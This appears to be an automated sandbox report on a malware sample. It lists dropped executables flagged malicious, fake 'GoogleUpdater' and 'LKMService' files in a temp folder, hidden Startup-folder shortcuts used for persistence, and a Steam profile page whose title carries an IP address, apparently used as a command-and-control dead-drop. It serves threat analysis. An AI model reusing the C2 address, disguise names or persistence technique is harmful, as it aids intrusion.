                                                                                                                                                                                                                                          SHA-512:AC549B9CF50E631BAE01152DB4523FDAB55F426EE77177AF900B088244665E28DE03C10784FE9DB33A2478BEE0D96BD50E5A668D2A2BFDFF3E8706AA8F5D71A2
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ... ....@.. .......................`.......7....`.....................................S.... ..B...........x...(&...@......`................................................ ............... ..H............text........ ...................... ..`.rsrc...B.... ......................@..@.reloc.......@......................@..B........................H.......@... ..............................................................+>J]..y.. 9..=...5..t...S..4;g./.k.T.l..>GP.OC.B.$...!.xV...X.,.7.D.qRY..\.8..`M.c....6...`...D6by..e>.Ty...."lZD;...6....FN6T.^:...z._.'.._......r;...n8...Ua..<.D8..4.OvZ.2.j;o.9...;.a.}.y.R......\......`2.fv.J.C.*D.cu..'.^,b......F^I..e..H.N!...&..x..D...."...5....z.J..sE.......H....b&DI..9..Z...l.{,w.F....-. O....2...Ak.8.<.!@@a'...2...A....%.l..?.a<y.....6zZ.....'..7..Q....v>

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fbfccd837ac_vadggdsa[1].exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):423840
                                                                                                                                                                                                                                          Entropy (8bit):7.988954975057422
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:hQq9JI/vWhNOAE2wMUZ0iR4HHW02AEPzYhDU9qcEO:5JXfOATt3202AHhD5ct
                                                                                                                                                                                                                                          MD5:237AF39F8B579AAD0205F6174BB96239
                                                                                                                                                                                                                                          SHA1:7AAD40783BE4F593A2883B6A66F66F5F624D4550
                                                                                                                                                                                                                                          SHA-256:836CE1411F26919F8FB95548D03C2F4DFD658FC525DFE21C7BE8ED65F81A5957
                                                                                                                                                                                                                                          SHA-512:DF46993A2029B22CBC88B289398265494C5A8F54EA803E15B7B12F4A7BC98152DF298916D341E3C3590329B35A806788AE294BAE2E6832F2A2AC426D0145504D
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................. ...........>... ...@....@.. ....................................`..................................>..S....@..B...........xQ..(&...`......`=............................................... ............... ..H............text........ ... .................. ..`.rsrc...B....@......."..............@..@.reloc.......`.......&..............@..B.................>......H.......@+.. ............................................................B,..Je.8..*.......Xf..3..Zm...v.$:...r......X...M..6'4..,.O.T...!..B..C.|....[.{2.y.d?1d2.m.......U5A9.3.B.[l.t..P3f.A*.y.z$.[Yi.............[..v..\..Bq..g.^.....pd....{....t.}.y*..[P....v.y.H. ..@.'2.^..4.h..7!.O.w.Jx...i....v...?.G.6^...`.q8..NZ..-.T...u...W1z.....K.._...*..7.-...H.<fz(..7..-..@.{.%.x.B.#.."...S4.,N.........iO......#T......jN.F.A......h.j..p..."&.xU-...`....4....

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66fbfcc9963ca_ldfsna[1].exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):391072
                                                                                                                                                                                                                                          Entropy (8bit):7.987128579531616
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:7RNcX3Y/L03IZz1t0oQqXl8uRa2rIfpympCmd75n3L2BdEtD+gEO:7RNcXoIYZz1t0IDr2y9md75bAy1rEO
                                                                                                                                                                                                                                          MD5:C7E7CFC3ED17AEF6C67C265389593EE3
                                                                                                                                                                                                                                          SHA1:44AAEA45A59F194F33FF435A430FCBD9E7434AD5
                                                                                                                                                                                                                                          SHA-256:0DDEBB36BEB37631DF17F68A14C90519F93BA7C200C62003527273119442E1FF
                                                                                                                                                                                                                                          SHA-512:6C5F7A6626AAC4B583D1165C4EA3BC69E315CDCE94D3E1D3442DC9643E0983F2A80E0495BAC79D4AA0E4DB309F0AAB373D917E6AF12FFAAD333ABA21E16249D2
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..f................................ ........@.. ..............................."....`.....................................S.......B...........x...(&..........`................................................ ............... ..H............text........ ...................... ..`.rsrc...B...........................@..@.reloc..............................@..B.......................H.......@... ..............................................................[(<.sT.w/.....x~I......T..T5Q>.z..*...b.S./....2E.w.>../.d..t_.s........o>...............UV.S.....a5..JK....Y.w......#....s."....-d..-7..av..n.\....]............L...t...:2o1.!.....*..q9_O......K.^...."...)0...3..$.5.,..}.....3cx.z.....2I}.......I.e...$. .....V ..OG...Ua.$+...%\.B-.U...3....nc...,..lf...f.o..`. bO.c2...R..]0o.f....<.9..^n\.....\..2....=.nk..7 .,o.8.#.b...*.T..g}qB.[

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\76561199780418869[1].htm

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):34879
                                                                                                                                                                                                                                          Entropy (8bit):5.3980737663499925
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:768:Mdpqme0Ih+3tAA6WGgefcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x21:Md8me0Ih+3tAA6WGgeFhTBv++nIjBtPh
                                                                                                                                                                                                                                          MD5:9B79663327C8B96F4C2EB8D4C2437DC8
                                                                                                                                                                                                                                          SHA1:B847A922D56D57BABC90703C664B885A9787A893
                                                                                                                                                                                                                                          SHA-256:12EFA3A6EE11B74C79D3B3109EC9AB153761E35AABB056C772660356F43377DB
                                                                                                                                                                                                                                          SHA-512:89D9DF50CE572BC9E7F11E858CE48208EF9FF566ED53BD77064EFEC84353AFEB17C64D25BC0C620958E37AA07BD57C541CE04CB54DC3A3CFD12A36E23CF6754E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://49.12.197.9|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href=

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):153088
                                                                                                                                                                                                                                          Entropy (8bit):7.492291528462448
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:wDvSQhc6JZga21nypl2IR1O1SAgDwpjsP/Kc+5vbC7ZQ:w7SQ/S2lpWiwpISJbC7
                                                                                                                                                                                                                                          MD5:CA9BAE7D8FA56F97BB596D225E1469C3
                                                                                                                                                                                                                                          SHA1:3DF5B3D39A47168AAC776137582CBBE6A94A9C22
                                                                                                                                                                                                                                          SHA-256:8EF212F5C726E72277B21AED2397390296CB4CE431B2270808925A22852FDBE9
                                                                                                                                                                                                                                          SHA-512:6667F71315C799A57BAEC9F53185B97D219130148C3E0F380CE93D4A016FF8C2A8AA78530E6ACD508595154562C3B6264F666EC6799746EE1306529A1144CDA6
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..f..........".......................... ....@.. ....................................`.................................`...K.......................................................................................................H.............Z H.i?8.... ......................@....text............................... ..`.rsrc................L..............@..@.reloc...............R..............@..B.....................T.............. ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe:Zone.Identifier

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):153088
                                                                                                                                                                                                                                          Entropy (8bit):7.492291528462448
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:wDvSQhc6JZga21nypl2IR1O1SAgDwpjsP/Kc+5vbC7ZQ:w7SQ/S2lpWiwpISJbC7
                                                                                                                                                                                                                                          MD5:CA9BAE7D8FA56F97BB596D225E1469C3
                                                                                                                                                                                                                                          SHA1:3DF5B3D39A47168AAC776137582CBBE6A94A9C22
                                                                                                                                                                                                                                          SHA-256:8EF212F5C726E72277B21AED2397390296CB4CE431B2270808925A22852FDBE9
                                                                                                                                                                                                                                          SHA-512:6667F71315C799A57BAEC9F53185B97D219130148C3E0F380CE93D4A016FF8C2A8AA78530E6ACD508595154562C3B6264F666EC6799746EE1306529A1144CDA6
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..f..........".......................... ....@.. ....................................`.................................`...K.......................................................................................................H.............Z H.i?8.... ......................@....text............................... ..`.rsrc................L..............@..@.reloc...............R..............@..B.....................T.............. ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe:Zone.Identifier

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1964072
                                                                                                                                                                                                                                          Entropy (8bit):7.999302542011407
                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                          SSDEEP:49152:h6qzkxccYdN/gvA5H+HQpZ4+Lue+2n8Zo+4i:h60cVvZQU+l+Oqo+7
                                                                                                                                                                                                                                          MD5:34EC7A5A9154386680A400B65CADA6CB
                                                                                                                                                                                                                                          SHA1:A97B1BF2C6AF2499C31510BD8C2EFCE3C50482F6
                                                                                                                                                                                                                                          SHA-256:F0BFCF5FC84FBBBE4B4A46CF51193A359CFDDBD79AA88F81D6DA4F5DAB79BA70
                                                                                                                                                                                                                                          SHA-512:3C675D631CD15283D3F258C90615C2BE10BCDB7F0405F4C3BA50A2C3B3F59F7533951F33BE75809E920B8D74FF56BBB83BF48E3EF9814621CF1DEA6CFBE55EEE
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$.f............................>.... ........@.. .......................@............`.....................................O.......................(&... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................ .......H....... ...............................................................w.K.....!......"h..&NJ$..m.UO....j.S....u.........YF...{AY..v.5:#I...5..,J..7+...:xJ&.m)/..u..Tj.=.....bU../E7...?.._.G\......z....d.{......$C=|.Ne.,M4_.?^9e.....@.....Fd8.......:..........-Z.N.......J.*.4*.H......D...]..0..+...[.hkZ...K.hR<2DC..+..=..~iNY+..py....,5..b%..0........^i..,...Nz...@hm.s.....d.w.B.4`..5..[o.l.Dr}@\.B...\...a....W.b.y`S0..0Rv.....l...-..(.1m7w1........5..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                          Size (bytes):1048575
                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Tm:Tm
                                                                                                                                                                                                                                          MD5:32F5C10B484B9DDE2F0722705BB5CDCC
                                                                                                                                                                                                                                          SHA1:B8BC8B287A933F167D91CDD25B48AE7C29D619B0
                                                                                                                                                                                                                                          SHA-256:22BF1BF2C700B63503F974B0D7851F7D740CFA108B2B309C8CD7790E7D6BB4B7
                                                                                                                                                                                                                                          SHA-512:2C99BD7D98867390352E6A60F284CD8768832ADF32E946F6EEB3BAEB9C46B49B3D3328F94C3D3EBAA0A9B54C2537C499BCC6B77BAD4C454186C93E4BF992BE4C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_03e867621a2c492fbfe23aa0225bca09.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:53 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.939976780707474
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8k7cDYlXPXv+RIgKef2jiSAzav/42eEFsuqygm:8koDYlf2Rb2sevgosryg
                                                                                                                                                                                                                                          MD5:5C4A90269EF45A0777AA4D99B8DDF4FD
                                                                                                                                                                                                                                          SHA1:22C89DFEA68C92091F0B968FCF6F25F818ECD40B
                                                                                                                                                                                                                                          SHA-256:DA187A53775452787C0D8E500B67F9BBDCED80D860971E6DA655D30E3610F155
                                                                                                                                                                                                                                          SHA-512:ADD81A545DFFB53D9AAECEAD8A9F7852344E92375EFC28C4FF64D2427448969FE9983CD6A6E95425311D61A5A5BC66FCBFE61F71DC7B579EBCEA4D35D6624E5A
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......~.e..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BYXe..EDGEUP~1..H......BYVeBYXe..........................w([.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_08cb3c594e2e4ed6b75f154e4c73428d.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:24 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.96068066829372
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8XsDYlXPXv+RDgKkj/jiSAzav/42eEFsuqygm:8XsDYlf2R47sevgosryg
                                                                                                                                                                                                                                          MD5:A258BDB66EE9BA8B8BA73D9BF7D4ED79
                                                                                                                                                                                                                                          SHA1:162F119786EF90AC432BAC3DE6413827ED7474F8
                                                                                                                                                                                                                                          SHA-256:873353BD17402E02F5B4053BBBB4D9CA1D8FE94601BEE7FACAB3C456E1F59526
                                                                                                                                                                                                                                          SHA-512:448403B2C6397B6CF3DFB9832E2234325F6E348BD0194C7BBA5C41D6DDE8A350B3E16BE99520A58D2F01F9B27C4124CBCB0BB1FDA1893A6FF4D1A8E75F919C1E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......eI...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^......................I..T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0dd7fd62174d4285b03947e7bfc87b65.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:31 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.9605750912072555
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8zisDYlXPXv+RWgKrlj/jiSAzav/42eEFsuqygm:82sDYlf2Rg7sevgosryg
                                                                                                                                                                                                                                          MD5:BFF9051C850DC1D052759B0EBEBC4183
                                                                                                                                                                                                                                          SHA1:62DD9EC547A115A6A7FC31C77CD32454E3C35413
                                                                                                                                                                                                                                          SHA-256:C3BA53E95475A0C8277B36D40C39E3A0BB1651B383F8208F1162A44DB7E633EE
                                                                                                                                                                                                                                          SHA-512:7AA3BD37E100A0D3A56DEF9E9FED0DB54B80D48975400C142500702BB7402E0EA9059511CD02B82EF106FC1BCE51520BD47926494668109F3F7460FF365EE079
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYpe..Temp..:......EW<2BYpe....^......................R$.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_184c5b243f6e4357a0e976190a4f7cb3.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:43 2024, mtime=Wed Oct 2 11:42:43 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1203
                                                                                                                                                                                                                                          Entropy (8bit):4.90130863931023
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8B7cDYlXPXv+RIgKe95MyAkfaUaPEwqOqdqygm:8BoDYlf2Rh5MRXUal1nyg
                                                                                                                                                                                                                                          MD5:5C643F4D966440460A002A2C88701132
                                                                                                                                                                                                                                          SHA1:4C6D29DCF7D04126A930B502687A84DE30238A4A
                                                                                                                                                                                                                                          SHA-256:F9624C9FDD1E826F118DD15089E6FE2189873857F95716758DA531BBAAED65EC
                                                                                                                                                                                                                                          SHA-512:A626B2DD02C6855AAE7EF0EF7B2042D728D36C037FE62E8C0FDFB6EE14961F9625EE24EC533407242E6DAE548D7248D6B01026AFC767719A2BBFF040FD036C32
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...m7f.....m7f..............V......................,.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BYVe..EDGEUP~1..H......BYVeBYVe.............................E.d.g.e.U.p.d.a.t.e.r.....p.2..V..BYUe".GOOGLE~1.EXE..T......BYVeBYVe..........................L5..G.o.o.g.l.e.U.p.d.a.t.e.r...e.x.e.......q...............-.......p............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.G.o.o.g.l.e.U.p.d.a.t.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$............

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_18a8c1823ade40de9a0d640e06558cd1.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:12 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.963013443085549
                                                                                                                                                                                                                                          Encrypted:false
